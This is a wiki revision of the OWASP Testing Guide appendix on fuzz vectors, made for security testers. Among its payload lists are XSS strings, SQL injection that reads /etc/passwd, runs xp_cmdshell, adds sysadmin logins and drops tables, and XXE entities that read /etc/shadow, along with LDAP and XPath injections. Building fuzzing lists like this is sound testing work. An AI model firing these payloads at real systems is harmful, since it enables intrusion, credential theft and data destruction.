Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14335</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14335"/>
